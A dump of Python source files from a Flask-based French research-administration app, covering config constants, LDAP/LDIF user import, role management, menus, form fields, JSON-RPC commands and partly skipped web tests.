assert t in VALID_TYPES, t
def get_message_dgrtt():
return get_constant("message_dgrtt", "OK")
def get_faq_categories():
categories = get_constant("faq_categories", [])
return [(x, x) for x in categories]
def _get_constants() -> Dict[str, Any]:
"""Get constants from config or local json with updating system.
Pick new constants that are defined in TYPES but are not saved in
the config yet from the json.
Upgrades constants that already exist, given the version number.
"""
from labster.domain.models.config import Config
config = Config.query.first()
if config is None:
config = Config()
db.session.add(config)
initial_constants = get_initial_constants()
# upgrade
_upgrade_if_needed(config, initial_constants)
constants = config.data
dotted_constants = DottedCollection.factory(constants)
json_dotted_constants = DottedCollection.factory(initial_constants)
if dotted_constants:
for key in TYPES.keys():
# do not write "key not in .keys()", it doesn't return "dotted keys".
if dotted_constants.get(key, _MARKER) is _MARKER:
dotted_constants[key] = json_dotted_constants.get(key)
constants = dotted_constants.to_python()
return constants
def _upgrade_if_needed(config: Config, initial_constants: Dict[str, Any]):
""" "data migration" tool.
- constants: the ones from the config, to update.
- initial_constants: from the json file, that may have additions.
"""
needs_commit = False
version = initial_constants.get("version")
if not version:
return
constants = config.data or {}
# Check the state we want rather than a version number.
# if version == 0.2 and constants.get('version', 0) < 0.2:
if "recrutement" not in constants:
constants["recrutement"] = {}
needs_commit = True
if "grades" not in constants["recrutement"]:
constants["recrutement"]["grades"] = []
needs_commit = True
if (
"recrutement" in constants
and constants["recrutement"]["grades"]
and constants["recrutement"]["grades"][0] == "IR"
):
constants["recrutement"]["grades"] = initial_constants["recrutement"]["grades"]
constants["version"] = version
needs_commit = True
if version == 0.3:
# add salaire_brut_mensuel_indicatif.doctorat-plus-3
# Maybe a new DB doesn't have salaire_brut_mensuel_indicatif yet.
if not constants["recrutement"].get("salaire_brut_mensuel_indicatif"):
constants["recrutement"][
"salaire_brut_mensuel_indicatif"
] = initial_constants["recrutement"]["salaire_brut_mensuel_indicatif"]
else:
post_doct_names = [
it[0]
for it in constants["recrutement"]["salaire_brut_mensuel_indicatif"][
"Post-doctorant"
]
]
if "doctorat-plus-3" not in post_doct_names:
constants["recrutement"]["salaire_brut_mensuel_indicatif"][
"Post-doctorant"
].append(
initial_constants["recrutement"]["salaire_brut_mensuel_indicatif"][
"Post-doctorant"
][-1]
)
# logger.info("--- constants updated for 0.3 - doctorat-plus-3")
constants["version"] = 0.3
needs_commit = True
if needs_commit:
config.data = constants
db.session.commit()
def get_initial_constants() -> Dict[str, Any]:
filename = dirname(__file__) + "/constants.json"
return json.load(open(filename, "rb"))
def get_constants() -> Dict[str, Any]:
constants = _get_constants()
return update_constants(constants)
_MARKER = object()
def get_constant(path: str, default: object = _MARKER) -> Any:
"""Return this constant's value from a dotted path.
Raises a KeyError if the path is illegal.
- path: a dotted key (str) (example: "convention.REMUNERATION")
- returns: the value or a default one (of the good type, if specified).
"""
if path not in TYPES:
raise KeyError(path)
constants = _get_constants()
dotted_constants = DottedCollection.factory(constants)
try:
value = dotted_constants[path]
if isinstance(value, DottedCollection):
return dotted_constants[path].to_python()
else:
return value
except KeyError:
pass
# If a default value is supplied, return it
if default != _MARKER:
return default
# Otherwise, use a default depending on the type
type_ = TYPES[path]
return default_value(type_)
def default_value(type_: str) -> Any:
if type_ in ["str", "HTML"]:
return ""
elif type_ == "int":
return 0
elif type_ == "float":
return 0.0
elif type_ == "bool":
return False
elif type_.startswith("list"):
return []
else:
raise RuntimeError(f"Unknown type: {type_}")
def save_constants(constants):
from labster.domain.models.config import Config
updated_constants = update_constants(constants)
config = Config.query.first()
if config is None:
config = Config(data=updated_constants)
else:
config.data = updated_constants
return config
def update_constants(constants: Dict[str, Any]) -> Dict[str, Any]:
if "types" in constants:
del constants["types"]
dotted_constants = DottedCollection.factory(constants)
updated_constants = DottedDict()
for key, type_ in TYPES.items():
try:
# do not write "key in .keys()", it doesn't check for dotted keys.
if dotted_constants.get(key, _MARKER) is not _MARKER:
value = dotted_constants[key]
elif key in TYPES.keys():
value = get_constant(key)
else:
value = default_value(type_)
except KeyError:
value = default_value(type_)
try:
value = coerce(value, type_)
except TypeError:
msg = "Wrong type for key: {}, value{} "
raise TypeError(msg.format(key, value))
check_type(key, value, type_)
updated_constants[key] = value
return updated_constants.to_python()
def check_type(key: str, value: Any, type_: str) -> None:
def ensure_types(types):
val = value
if isinstance(value, DottedCollection):
val = value.to_python()
if not isinstance(val, types):
msg = f"Wrong type for key: {key}. Expected: {type_}, got: {type(val)}"
raise TypeError(msg)
if type_ == "int":
ensure_types(int)
elif type_ == "float":
ensure_types((float, int))
elif type_ == "str":
ensure_types(str)
elif type_ == "bool":
ensure_types(bool)
elif type_.startswith("list"):
ensure_types(list)
# TODO: more specific cases
def coerce(value: Any, type_: str) -> Any:
if type_ == "int":
return int(value)
elif type_ == "float":
return float(value)
elif type_ == "str":
return str(value)
elif type_ == "bool":
return bool(value)
else:
return value
```
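A minimal usage sketch for this service (illustrative; it assumes a configured application context, since `_get_constants` reads the `Config` row through the SQLAlchemy session):
```python
from labster.domain.services.constants import get_constant, get_constants

# One constant by dotted path; the typed default (0.0 for a float) is
# returned when the value was never configured.
point_indice = get_constant("point_indice")

# The whole dict, coerced and checked against TYPES.
constants = get_constants()
```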
#### File: labster/extensions/profiler.py
```python
from __future__ import annotations
import flask_profiler
def register_profiler(app):
config = app.config
if not config.get("PROFILER_ENABLE"):
return
password = config.get("PROFILER_PASSWORD")
config["flask_profiler"] = {
"enabled": True,
"storage": {"engine": "sqlalchemy"},
"ignore": ["^/static/.*"],
}
if password:
config["flask_profiler"]["basicAuth"] = {
"enabled": True,
"username": "profiler",
"password": password,
}
flask_profiler.init_app(app)
```
#### File: labster/ldap/ldif.py
```python
from __future__ import annotations
import re
from io import BytesIO
from typing import Any, Dict, List, Optional, Tuple
import structlog
from attr import attrs
from devtools import debug
from flask_sqlalchemy import SQLAlchemy
from ldif import LDIFParser
from tqdm import tqdm
from labster.di import injector
from labster.domain2.model.profile import Profile, ProfileRepository
from labster.domain2.model.structure import Structure, StructureRepository
from labster.ldap.constants import ADMINS_DN, PRESIDENCE_DN, SU_DN, \
get_parent_dn
logger = structlog.get_logger()
profile_repo = injector.get(ProfileRepository)
structure_repo = injector.get(StructureRepository)
db = injector.get(SQLAlchemy)
def parse_ldif_file(ldif_file: str) -> List[Tuple[str, Dict[str, Any]]]:
logger.info(f"### Parsing LDIF file {ldif_file}")
orig_ldif_fd = open(ldif_file, "rb")
ldif_fd = BytesIO()
for line in orig_ldif_fd.readlines():
if line.startswith(b"# search result"):
break
ldif_fd.write(line)
ldif_fd.seek(0)
parser = LDIFParser(ldif_fd)
return list(parser.parse())
@attrs(auto_attribs=True)
class LdifRecord:
raw: Dict[str, List[str]]
def __getattr__(self, name):
return self.raw.get(name, [""])[0]
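    # Hypothetical example: LdifRecord({"sn": ["Dupont"]}).sn == "Dupont",
    # while any attribute missing from the raw entry falls back to "".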
@property
def uid(self) -> Optional[str]:
if "uid" not in self.raw:
return None
return self.raw["uid"][0]
@property
def affectation(self) -> Optional[str]:
        structure_affectation = self._get_structure_d_affectation()
        if not structure_affectation:
            return None
        affectation = structure_affectation.dn
if affectation in ADMINS_DN:
affectation = get_parent_dn(affectation)
if affectation == PRESIDENCE_DN:
affectation = SU_DN
return affectation
def _get_structure_d_affectation(self) -> Optional[Structure]:
structure_d_affectation = None
affectation_principale = self.supannEntiteAffectationPrincipale
if affectation_principale:
structure_d_affectation = (
db.session.query(Structure)
.filter(Structure.supann_code_entite == affectation_principale)
.first()
)
if structure_d_affectation:
return structure_d_affectation
# Old LDIF format
affectation = self.sorbonneUniversiteEmpAffectation
if affectation:
structure_d_affectation = (
db.session.query(Structure).filter(Structure.dn == affectation).first()
)
if structure_d_affectation:
return structure_d_affectation
return None
@property
def fonctions(self):
return self.raw.get("eduPersonAffiliation", [])
@property
def address(self):
adresse = self.raw.get("postalAddress", [""])[0]
adresse = adresse.replace("$", "\n")
adresse = re.sub("\n\n+", "\n\n", adresse)
adresse = adresse.strip()
return adresse
def update_users_from_records(records: List[Tuple[str, Dict[str, List[str]]]]):
profiles = profile_repo.get_all()
old_profile_uids = {
profile.uid for profile in profiles if profile.uid and profile.active
}
count0 = len(old_profile_uids)
print(f"old total: {count0:d}")
logger.info(f"old total: {count0:d}")
new_profile_uids = set()
for _dn, r in records:
if "uid" not in r:
continue
uid = r["uid"][0]
new_profile_uids.add(uid)
deleted_uids = old_profile_uids.difference(new_profile_uids)
deactivate_users(deleted_uids)
uids_to_profiles = {p.uid: p for p in profiles}
print("Updating profiles from LDIF dump")
for _dn, r in tqdm(records, disable=None):
record = LdifRecord(r)
if not record.uid:
continue
        uid = record.uid
if uid in uids_to_profiles:
profile = uids_to_profiles[uid]
else:
profile = Profile(uid=uid)
profile_repo.put(profile)
update_profile_from_record(profile, record)
def deactivate_users(deleted_uids):
logger.info("To be deactivated:", deleted_uids=deleted_uids)
for uid in tqdm(deleted_uids, disable=None):
user = profile_repo.get_by_uid(uid)
user.deactivate()
def update_profile_from_record(profile: Profile, record: LdifRecord):
assert profile
profile.nom = record.sn
profile.prenom = record.givenName
profile.uid = record.uid
profile.email = record.mail
profile.telephone = record.telephoneNumber
    profile.adresse = record.address
    profile.login = record.supannAliasLogin
affectation = record.affectation
if not affectation:
if profile.active:
profile.affectation = ""
profile.deactivate()
return
if not profile.active:
profile.activate()
if profile.affectation != affectation:
profile.affectation = affectation
fonctions = list(record.fonctions)
if set(profile.fonctions) != set(fonctions):
profile.fonctions = fonctions
```
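A hedged sketch of how the two entry points above chain together (the dump path is an example, and a configured application context is assumed):
```python
from labster.ldap.ldif import parse_ldif_file, update_users_from_records

# parse_ldif_file stops at the "# search result" marker of an ldapsearch dump.
records = parse_ldif_file("/tmp/annuaire.ldif")
# Deactivates users absent from the dump, creates or updates the others.
update_users_from_records(records)
```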
#### File: labster/ldap/roles.py
```python
from __future__ import annotations
from tqdm import tqdm
from labster.di import injector
from labster.domain2.model.profile import Profile, ProfileRepository
from labster.domain2.model.structure import StructureRepository
from labster.domain2.services.roles import Role, RoleService
class RolesUpdater:
def __init__(self):
self.profile_repo = injector.get(ProfileRepository)
self.structure_repo = injector.get(StructureRepository)
self.role_service = injector.get(RoleService)
def update_roles(self, max=0):
profiles = self.profile_repo.get_all()
print("nbre de profils", len(profiles))
if max:
profiles = list(profiles)[0:max]
for profile in tqdm(profiles, disable=None):
if not profile.active:
continue
self.update_roles_for(profile)
def update_roles_for(self, user: Profile):
self.update_role_membre_affecte(user)
self.role_service.update_roles(user)
# TODO
# self.update_role_porteur(user)
def update_role_membre_affecte(self, user: Profile):
roles = self.role_service.get_roles_for_user(user)
structures_actuelles = list(roles.get(Role.MEMBRE_AFFECTE, []))
if (
len(structures_actuelles) == 1
and structures_actuelles[0].dn == user.affectation
):
return
for structure in structures_actuelles:
self.role_service.ungrant_role(user, Role.MEMBRE_AFFECTE, structure)
structure = self.structure_repo.get_by_dn(user.affectation)
if structure:
self.role_service.grant_role(user, Role.MEMBRE_AFFECTE, structure)
# def update_role_porteur(self, user: Profile):
# if "researcher" in user.fonctions or "faculty" in user.fonctions:
# self.remove_role_porteur(user)
# structure = self.structure_repository.get_by_dn(user.affectation)
# self.role_service.grant_role(user, Role.PORTEUR, structure)
#
# else:
# self.remove_role_porteur(user)
#
# def remove_role_porteur(self, user: Profile):
# roles = self.role_service.get_roles_for_user(user)
# structures = roles.get(Role.PORTEUR, [])
# for structure in structures:
# self.role_service.ungrant_role(user, Role.PORTEUR, structure)
```
#### File: src/labster/menu.py
```python
from __future__ import annotations
from labster.domain2.services.roles import Role
from labster.lib.menu import Menu
from labster.rbac import can_view_stats
MAIN = {
"label": "Menu principal",
"entries": [
# Homes
{"label": "Accueil", "to": "/", "icon": "home"},
{
"label": "Tâches",
"to": "/tasks",
"icon": "check-square",
},
{
"label": "Mes demandes en cours",
"to": "/demandes",
"icon": "briefcase",
},
{
"label": "Demandes archivées",
"to": "/archives",
"icon": "graduation-cap",
},
# Stuff
{"label": "Questions & suggestions", "to": "/faq", "icon": "question"},
{
"label": "Statistiques",
"to": "/bi",
"icon": "chart-line",
"precondition": can_view_stats,
},
{
"label": 'Calculette "devis RH"',
"to": "/calculette_rh",
"icon": "calculator",
},
{
"label": 'Calculette "feuille de coûts"',
"endpoint": "main.calculette_feuille_cout",
"icon": "calculator",
},
],
}
ANNUAIRES = {
"label": "Annuaires",
"entries": [
{"label": "Structures", "to": "/annuaire/structures", "icon": "sitemap"},
{"label": "Utilisateurs", "to": "/annuaire/users", "icon": "user"},
{
"label": "Contacts Lab&Co",
"to": "/contacts",
"icon": "arrows-alt",
"requires_role": {"alc"},
},
],
}
ADMIN = {
"label": "Administration",
"entries": [
# {"label": "Home", "icon": "home", "requires_role": {"alc"},},
# {"label": "Tableau de bord", "icon": "chart-line", "requires_role": {"alc"},},
{
"label": "Gérer la FAQ",
"icon": "question",
"to": "/admin/faq",
"requires_role": {Role.ADMIN_CENTRAL, Role.FAQ_EDITOR},
},
{
"label": "Config",
"icon": "sliders-h",
"to": "/admin/constants",
"requires_role": {"alc"},
},
{
"label": "Rôles globaux",
"icon": "lock",
"to": "/admin/roles",
"requires_role": {"alc"},
},
# {
# "label": "Financeurs",
# "icon": "euro-sign",
# # "endpoint": "admin2.financeurs",
# "requires_role": {"alc"},
# },
],
}
def get_menu(user):
menus = [Menu(MAIN), Menu(ANNUAIRES), Menu(ADMIN)]
return [m for m in menus if not m.is_empty()]
```
#### File: newforms/base/fields.py
```python
from __future__ import annotations
import uuid
from typing import List
from flask_babel import format_date
from labster.domain.models.profiles import Profile
from labster.domain.models.util import parse_date
from labster.types import JSONDict
class Field:
required = False
visible = True
hidden = False
editable = True
scalar = True
note = ""
specs: List[List[str]] = []
def __init__(self, name, label, **kw):
self.name = name
self.label = label
for k, v in kw.items():
setattr(self, k, v)
def to_dict(self) -> JSONDict:
return {
"name": self.name,
"type": self.__class__.__name__,
"scalar": self.scalar,
"label": self.label,
"required": self.required,
"visible": self.visible,
"hidden": self.hidden,
"editable": self.editable,
"note": self.note,
"specs": self.specs,
}
def get_display_value(self, demande) -> str:
"""Return the name of this field for display in the form."""
if self.name == "porteur":
            # get a Profile object, so that we get the full_name below
            # and not just its uid.
value = demande.porteur
else:
value = demande.data.get(self.name, "")
if value in (None, "None"):
value = ""
elif value is False:
value = "Non"
elif value is True:
value = "Oui"
elif isinstance(value, Profile):
value = value.full_name
return str(value)
class StringField(Field):
pass
class DateField(Field):
def get_display_value(self, demande):
value = demande.data.get(self.name, "")
date_value = parse_date(value)
if not value:
return ""
return format_date(date_value, format="medium")
class IntegerField(Field):
pass
class EmailField(Field):
pass
class BooleanField(Field):
pass
class Boolean2Field(Field):
pass
class TriStateField(Field):
pass
# def make_choices(l: List[str]):
# return [{"value": x, "label": x} for x in l]
class Select2Field(Field):
choices: List[str] = []
def to_dict(self) -> JSONDict:
d = Field.to_dict(self)
if callable(self.choices):
choices = self.choices()
else:
choices = self.choices
d["choices"] = choices
return d
# if choices and isinstance(choices[0], str):
# d["choices"] = make_choices(choices)
# else:
# d["choices"] = choices
# return d
class MultipleSelect2Field(Field):
choices: List[str] = []
def to_dict(self) -> JSONDict:
d = Field.to_dict(self)
if callable(self.choices):
choices = self.choices()
else:
choices = self.choices
d["choices"] = choices
return d
class TextAreaField(Field):
pass
class HTML(Field):
editable = False
def __init__(self, text, name=""):
if not name:
name = "html-" + uuid.uuid4().hex
super().__init__(name, text)
class ListField(Field):
scalar = False
class ListePartenaires(ListField):
specs = [
["nom_partenaire", "Nom du partenaire"],
["prenom_nom_contact", "Contact"],
["mail_contact", "Email"],
["telephone_contact", "Téléphone"],
]
class ListePartenairesContactes(ListField):
specs = [
["contact", "Contact"],
["nom_partenaire", "Nom du partenaire"],
]
class ListeDivulgationsPassees(ListField):
specs = [
["type_divulgation", "Type de divulgation"],
["titre", "Titre"],
["date_lieu", "Date et lieu"],
]
class ListeDivulgationsFutures(ListField):
specs = [
["type_divulgation", "Type de divulgation"],
["date", "Date envisagée"],
]
class ListeContrats(ListField):
specs = [
["contrat", "Contrat/Partenariat de recherche"],
["date_signature", "Date de signature du contrat"],
["reference", "Référence du contrat"],
]
class ListeMateriels(ListField):
specs = [
["materiel", "Matériel"],
]
class ListeAutresDeclarations(ListField):
specs = [
["type_protection", "Type de protection"],
["organisme", "Organisme ayant fait le dépôt"],
["exploitation", "Exploitation industrielle"],
]
class ListeLicencesExistantes(ListField):
specs = [
["type_licence", "Type de la licence"],
["nom_version_licence", "Nom et version de la licence"],
]
class FieldSet:
def __init__(self, name, label, fields):
self.name = name
self.label = label
self.fields = fields
self.visible = True
self.hidden = False
def to_dict(self) -> JSONDict:
return {
"name": self.name,
"type": [self.__class__.__name__],
"label": self.label,
"fields": [field.name for field in self.fields],
"visible": self.visible,
"hidden": self.hidden,
}
def __repr__(self):
return f"<FieldSet name={self.name} visible={self.visible}>"
```
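As an illustration of the small form DSL above (field names and labels are hypothetical):
```python
# A scalar field, a date field, and a fieldset grouping them.
nom = StringField("nom", "Nom", required=True)
date_debut = DateField("date_debut", "Date de début")
identite = FieldSet("identite", "Identité", [nom, date_debut])

# Both sides serialize to JSON-friendly dicts for the front end.
nom.to_dict()       # {"name": "nom", "type": "StringField", ...}
identite.to_dict()  # {"name": "identite", "fields": ["nom", "date_debut"], ...}
```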
#### File: rpc/commands/constants.py
```python
from __future__ import annotations
from flask_sqlalchemy import SQLAlchemy
from jsonrpcserver import method
from werkzeug.exceptions import BadRequest
from labster.di import injector
from labster.domain2.services.constants import save_constants
db = injector.get(SQLAlchemy)
@method
def update_constants(constants):
if not constants:
raise BadRequest()
save_constants(constants)
db.session.commit()
```
#### File: rpc/commands/membres.py
```python
from __future__ import annotations
from typing import Dict, List
from flask_sqlalchemy import SQLAlchemy
from jsonrpcserver import method
from labster.di import injector
from labster.domain2.model.profile import Profile, ProfileRepository
from labster.domain2.model.structure import StructureRepository
from labster.domain2.services.roles import Role, RoleService
from labster.rpc.cache import cache
structure_repo = injector.get(StructureRepository)
profile_repo = injector.get(ProfileRepository)
role_service = injector.get(RoleService)
db = injector.get(SQLAlchemy)
@method
def update_membres_rattaches(structure_id: str, values: List[Dict]):
structure = structure_repo.get_by_id(structure_id)
assert structure
membres: List[Profile] = role_service.get_users_with_given_role(
Role.MEMBRE_RATTACHE, structure
)
current_membre_ids = {m.id for m in membres}
updated_membre_ids = {m["id"] for m in values}
membres_to_add = updated_membre_ids.difference(current_membre_ids)
for user_id in membres_to_add:
user = profile_repo.get_by_id(user_id)
role_service.grant_role(user, Role.MEMBRE_RATTACHE, structure)
membres_to_remove = current_membre_ids.difference(updated_membre_ids)
for user_id in membres_to_remove:
user = profile_repo.get_by_id(user_id)
role_service.ungrant_role(user, Role.MEMBRE_RATTACHE, structure)
db.session.commit()
cache.evict("users")
cache.evict("structures")
```
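The command receives the complete target membership and diffs it against the current one; a sketch of a call (the ids are hypothetical):
```python
# Grants MEMBRE_RATTACHE to any listed profile that lacks it, and revokes
# it from members that are no longer listed.
update_membres_rattaches("structure-42", [{"id": "profile-1"}, {"id": "profile-2"}])
```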
#### File: rpc/commands/misc.py
```python
from __future__ import annotations
from flask import request
from jsonrpcserver import method
@method
def exit():
func = request.environ.get("werkzeug.server.shutdown")
func()
```
#### File: rpc/commands/workflow.py
```python
from __future__ import annotations
from flask_sqlalchemy import SQLAlchemy
from jsonrpcserver import method
from labster.di import injector
from labster.domain2.model.demande import Demande
from labster.security import get_current_profile
@method
def wf_transition(demande_id, action, data=None):
data = data or {}
user = get_current_profile()
db = injector.get(SQLAlchemy)
demande = db.session.query(Demande).get(demande_id)
workflow = demande.get_workflow(user)
try:
transition = workflow.get_transition_by_id(action)
except IndexError:
msg = (
"Action impossible. Quelqu'un a probablement effectué une action "
"sur la demande en parallèle avec vous.",
"danger",
)
return msg
workflow.execute_transition(transition, data=data)
db.session.commit()
msg = (
f"Votre action '{transition.label}' sur la demande '{demande.nom}' a bien été prise en compte.",
"success",
)
return msg
# @method
# def wf_transition(demande_id, action):
# user = get_current_profile()
# db = injector.get(SQLAlchemy)
#
# form = transition.get_form(workflow)
# for field in form:
# field.form = form
# is_form_valid = form.validate()
#
# if __action == "confirm":
# if is_form_valid:
# data = {}
# for field in form:
# data[field.id] = field.data
# workflow.execute_transition(transition, data=data)
# db.session.commit()
# flash(
# "Votre action '{}' sur la demande '{}' a bien été prise en compte.".format(
# transition.label, demande.nom
# )
# )
# return redirect(url_for(demande, _external=True))
# else:
# flash(
# "Merci de bien vouloir corriger ou compléter les informations "
# "ci-dessous.",
# "danger",
# )
# flash(f"{form.errors}")
#
# title = "Confirmer l'action"
# breadcrumbs = [{"name": "Demandes", "url": url_for(".demandes")}, {"name": title}]
#
# ctx = {
# "title": title,
# "breadcrumbs": breadcrumbs,
# "form": form,
# "transition": transition,
# "demande": demande,
# }
# return render_template("wf/confirm.html", **ctx)
```
#### File: rpc/queries/user.py
```python
from __future__ import annotations
import json
from typing import Any, Dict, List, Optional, Set, Tuple
from werkzeug.exceptions import NotFound
from labster.di import injector
from labster.domain2.model.profile import Profile, ProfileId, ProfileRepository
from labster.domain2.model.structure import Structure, StructureRepository
from labster.domain2.model.type_structure import DE, EQ
from labster.domain2.services.contacts import ContactService
from labster.domain2.services.roles import Role, RoleService
from labster.rpc.registry import context_for
from labster.types import JSON, JSONDict
role_service = injector.get(RoleService)
contact_service = injector.get(ContactService)
profile_repo = injector.get(ProfileRepository)
structure_repo = injector.get(StructureRepository)
@context_for("user")
def get_user(id: str) -> JSONDict:
user = profile_repo.get_by_id(ProfileId(id))
if not user:
user = profile_repo.get_by_old_uid(id)
if not user:
raise NotFound()
structure_affectation_dto: JSON
if user.affectation:
structure_affectation = structure_repo.get_by_dn(user.affectation)
if structure_affectation:
structure_affectation_dto = {
"name": structure_affectation.sigle_ou_nom,
"id": structure_affectation.id,
}
else:
structure_affectation_dto = None
else:
structure_affectation_dto = None
user_dto = {}
for k in ["nom", "prenom", "email", "telephone", "uid", "affectation", "login"]:
user_dto[k] = getattr(user, k)
    # Special case: fonctions is a set(), not a list.
if isinstance(user.fonctions, str):
fonctions = json.loads(user.fonctions)
else:
fonctions = user.fonctions
user_dto["fonctions"] = sorted(fonctions)
roles_dto = get_roles_dto_for_user(user, skip=True)
perimetre_dto = get_perimetre_dto_for_user(user)
ctx = {
"name": user.full_name,
"user": user_dto,
"structure_affectation": structure_affectation_dto,
"roles": roles_dto,
"perimetre": perimetre_dto,
}
return ctx
#
# Serialization helpers
#
def get_roles_dto_for_user(
user: Profile, base_structure: Optional[Structure] = None, skip: bool = False
) -> List[Dict[str, Any]]:
roles_for_user = role_service.get_roles_for_user(user)
all_structures = {}
for contexts in roles_for_user.values():
for context in contexts:
if not context:
continue
assert isinstance(context, Structure)
all_structures[context.id] = context
list_structures = list(all_structures.values())
list_structures.sort(key=lambda s: s.depth)
ancestors: Set[Structure]
if base_structure:
ancestors = set(base_structure.ancestors)
else:
ancestors = set()
def get_roles_list(structure):
role_list: List[str] = []
for role, structures in roles_for_user.items():
if role == Role.MEMBRE:
continue
if structure in ancestors:
continue
if (
skip
and role == Role.MEMBRE_AFFILIE
and structure.type_name != "Département"
):
continue
if structure in structures:
role_list.append(role.value)
role_set = set(role_list)
if Role.MEMBRE_AFFECTE.value in role_set:
role_set.discard(Role.MEMBRE_AFFILIE.value)
role_list = list(role_set)
role_list.sort()
return role_list
roles_dto = []
for structure in list_structures:
role_list = get_roles_list(structure)
if not role_list:
continue
dto = {
"structure": {
"name": structure.sigle_ou_nom,
"type": structure.type_name,
"reelle": structure.is_reelle,
"id": structure.id,
"depth": structure.depth,
},
"roles": role_list,
}
roles_dto.append(dto)
def sorter(dto) -> Tuple[int, int]:
structure = dto["structure"]
depth = structure["depth"]
if set(dto["roles"]) & {
Role.MEMBRE_AFFECTE.value,
Role.MEMBRE_RATTACHE.value,
Role.MEMBRE_AFFILIE.value,
Role.MEMBRE.value,
Role.PORTEUR.value,
Role.SIGNATAIRE.value,
Role.RESPONSABLE.value,
}:
if structure["reelle"]:
return (1, depth)
if structure["type"] in {EQ.name, DE.name}:
return (2, depth)
return (3, depth)
if dto["roles"] == Role.GESTIONNAIRE.value:
return (4, depth)
if dto["roles"] == Role.ADMIN_LOCAL.value:
return (5, depth)
return (6, depth)
roles_dto.sort(key=sorter)
return roles_dto
def get_perimetre_dto_for_user(user) -> List[Dict[str, Any]]:
mapping = contact_service.get_mapping()
result = []
for structure, d in mapping.items():
for contact_type, profile in d.items():
if profile == user:
structure_dto = {
"name": structure.sigle_ou_nom,
"id": structure.id,
"type": structure.type_name,
"depth": structure.depth,
}
dto = {"structure": structure_dto, "types": [contact_type.value]}
result.append(dto)
return result
```
#### File: rpc/tests/test_roles.py
```python
from __future__ import annotations
from glom import glom
from pytest import mark
from labster.domain2.model.profile import Profile
from labster.domain2.model.structure import Structure
from labster.domain2.model.type_structure import UN
from labster.domain2.services.roles import Role
from labster.rpc.commands.roles import add_roles, delete_role
from labster.rpc.queries.roles import get_role_selectors, get_roles
@mark.skip
def test_roles(structure_repo, profile_repo):
universite = Structure(nom="SU", type_name=UN.name)
structure_repo.put(universite)
user = Profile(uid="toto")
profile_repo.put(user)
result = get_roles(universite.id)
assert glom(result, (["users"], [["id"]])) == [[], [], [], [], []]
add_roles(universite.id, [user.id], Role.PORTEUR.name)
result = get_roles(universite.id)
assert glom(result, (["users"], [["id"]])) == [[], [], [], [], [user.id]]
delete_role(universite.id, user.id, Role.PORTEUR.name)
result = get_roles(universite.id)
assert glom(result, (["users"], [["id"]])) == [[], [], [], [], []]
result = get_role_selectors(universite.id)
# First select is not multiple
assert glom(result, ["value"]) == [None, [], [], [], []]
```
#### File: labster/test/test_web.py
```python
from __future__ import annotations
import os
import uuid
import pytest
from flask import url_for
from labster.di import injector
from labster.domain2.model.structure import Structure, StructureRepository
from labster.domain2.model.type_structure import UN
from labster.domain.models.profiles import Profile
from labster.domain.models.unites import LABORATOIRE, OrgUnit
from labster.domain.services.roles import ROLES
IGNORED_ENDPOINTS = ["auth.callback", "auth.backdoor"]
# FIXME
if os.environ.get("TRAVIS"):
pytest.skip("These tests currently fail on Travis", allow_module_level=True)
pytest.skip(
"These tests currently fail since recent refactoring", allow_module_level=True
)
structure_repo = injector.get(StructureRepository)
#
# 'auth' blueprint
#
def test_login(client, db_session):
r = client.get(url_for("auth.login"))
assert r.status_code == 200
#
# 'main' blueprint
#
def test_home_as_anonymous(client, db_session):
r = client.get(url_for("main.home"))
assert r.status_code == 302
def test_home_as_dgrtt(client, db_session):
login_as_dgrtt(client, db_session)
r = client.get(url_for("main.home"), follow_redirects=True)
assert r.status_code == 200
def test_home_as_gdl(client, db_session):
login_as_gdl(client, db_session)
r = client.get(url_for("main.home"), follow_redirects=True)
assert r.status_code == 200
#
#
#
def test_url_for(app, db_session):
assert url_for("main.home") == "http://localhost.localdomain/"
p = Profile(uid="ayuso", nom="Ayuso", prenom="Sandrine", email="<EMAIL>")
assert url_for(p)
dn = f"test{uuid.uuid4()}"
nom = f"nom{uuid.uuid4()}"
labo = OrgUnit(type=LABORATOIRE, dn=dn, nom=nom)
assert url_for(labo)
# TODO: remove soon
# def test_directory(client, db_session):
# login_as_dgrtt(client, db_session)
# r = client.get(url_for("directory.home"))
# assert r.status_code == 200
#
# login_as_gdl(client, db_session)
# r = client.get(url_for("main.home"), follow_redirects=True)
# assert r.status_code == 200
#
#
# def xxx_test_nouvelle_demande_rh(client, db_session):
# login_as_gdl(client, db_session)
#
# r = client.get(url_for("demandes.demande_new"))
# assert r.status_code == 200
#
# data = {"prenom": "Snake", "nom": "Plisken"}
# r = client.post(
# url_for("demandes.demande_new_post"), data=data, follow_redirects=True
# )
# assert r.status_code == 200
# assert "<NAME>" in r.get_data(as_text=True)
#
# # debug_info = get_debug_info(r)
# # url = debug_info['url']
#
# r = client.get(url_for("demandes.demandes"), follow_redirects=True)
# assert r.status_code == 200
# assert "<NAME>" in r.get_data(as_text=True)
#
#
# #
# # Admin
# #
# def test_admin_views(client, db_session):
# login_as_dgrtt(client, db_session)
#
# r = client.get(url_for("admin2.home"))
# assert r.status_code == 200
#
# r = client.get(url_for("admin2.financeurs"))
# assert r.status_code == 200
#
# r = client.get(url_for("admin2.mapping_dgrtt"))
# assert r.status_code == 200
#
# All...
#
@pytest.mark.parametrize("role", ROLES)
def test_all_simple_endpoints(role, client, app, db_session):
# Setup repo with a root
structure_repo.clear()
universite = Structure(
nom="Sorbonne Université",
type_name=UN.name,
sigle="SU",
dn="ou=SU,ou=Affectations,dc=chapeau,dc=fr",
)
structure_repo.put(universite)
login_as_dgrtt(client, db_session)
Profile.__roles = [role]
endpoints = get_endpoints(app)
try:
for endpoint in endpoints:
print(f"checking endpoint '{endpoint}' with role '{role}'")
check_endpoint(endpoint, client)
finally:
del Profile.__roles
structure_repo.clear()
def get_endpoints(app):
endpoints = []
for rule in app.url_map.iter_rules():
if "GET" not in rule.methods:
continue
endpoint = rule.endpoint
blueprint_name = endpoint.split(".")[0]
# Skip a few hard cases (FIXME after the SPA migration)
if blueprint_name not in {"auth", "v3"}:
continue
# if blueprint_name not in ["main", "admin2"]:
# return
if endpoint in IGNORED_ENDPOINTS:
continue
if rule.arguments:
continue
endpoints.append(rule.endpoint)
return endpoints
def check_endpoint(endpoint, client):
url = url_for(endpoint)
try:
r = client.get(url)
except Exception:
print(f"Error on url: {url} (endpoint: {endpoint})")
raise
assert r.status_code in (200, 302, 401, 403), f"for endpoint = '{endpoint}'"
#
# Util
#
def login_as_dgrtt(client, db_session):
p = Profile(uid="ayuso", nom="Ayuso", prenom="Sandrine", email="<EMAIL>")
p.__roles = ["alc", "dgrtt"]
db_session.add(p)
db_session.flush()
login_as(p, client)
